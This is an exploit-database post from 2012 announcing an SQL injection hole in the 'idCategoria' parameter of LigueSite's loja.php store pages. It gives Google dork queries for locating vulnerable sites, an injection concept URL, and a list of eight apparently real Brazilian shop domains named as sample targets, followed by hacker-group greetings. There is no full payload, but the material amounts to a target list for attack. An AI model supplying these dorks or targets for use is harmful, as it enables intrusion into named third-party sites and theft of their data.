LigueSite - SQL Injection Vulnerability

2012-03-16T00:00:00
ID 1337DAY-ID-17752
Type zdt
Reporter the_cyber_nuxbie
Modified 2012-03-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Official Website: http://www.1337day.com                        0
1  [+] Support E-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1                ##########################################            1
0                I'm NuxbieCyber Member From Inj3ct0r Team             1
1                ##########################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

========================================================================
<<<|>>>          LigueSite - SQL Injection Vulnerability         <<<|>>>
========================================================================
                                                          
 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<< [email protected] >>> CP: +62856-2538-963 $ YM: nux_exploit
 Credit : Catur Febrian [ nuxbie ]
 
 - Info WebApps:
 This Content Develop By LigueSite:
 http://liguesite.com.br/
 
 - Google Dork:
 inurl:"/loja.php?idCategoria="
 intext:"Desenvolvido por Liguesite.com.br"

 - Exploit Concept:
 http://lokalisasi/WebApps/loja.php?idCategoria=[SQL Injection]

 - Sample WebApps Vuln SQLi:
 http://realstrings.com.br/loja.php?idCategoria=22' + [SQL Injection]
 http://miranmix.com.br/loja.php?idCategoria=28' + [SQL Injection]
 http://ezioflores.com.br/loja.php?idCategoria=13' + [SQL Injection]
 http://yrev.com.br/lojavirtual/loja.php?idCategoria=9' + [SQL Injection]
 http://connectionwork.com.br/loja.php?idCategoria=6' + [SQL Injection]
 http://clubeliguesite.com.br/loja.php?idCategoria=33' + [SQL Injection]
 http://renasceralphaville.com.br/loja.php?idCategoria=21' + [SQL Injection]
 http://terrafofa.com.br/loja.php?idCategoria=14' + [SQL Injection]
 , And many More @ Google...!!!

 [x] Greetz,,,
 *** 1337day Inj3ct0r TEAM ***
 ...:::' All Member & Staff Inj3ct0r TEAM ':::...
 
 - Special Thanks:
 Alloh SWT (GOD)
 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Friend: nux, kapan lu mau kuliah?
 Nuxbie: sek bro, nyuwun pangestune wae lah, hurung nduwe rejeki kok_
 Friend: yaudah, lu harus kuliah dah, manfaatin waktu demi masa depan lu
 Nuxbie: kemaren dapet info uang muka 8juta, gw nggak ada duit segitu_
 Friend: kok lu gak ambil paket cuma 18juta sampek lulus S1 sekalian?
 Nuxbie: Gubrak!!! duit dari mana gw,,, :-p
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 [ Inj3ct0r | PacketStromSecurity | Exploit-DB ]
 
 Me @ Solo Raya, 17 March 2012 @ 01:21 AM. Central Java, Indonesian.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



#  0day.today [2018-03-05]  #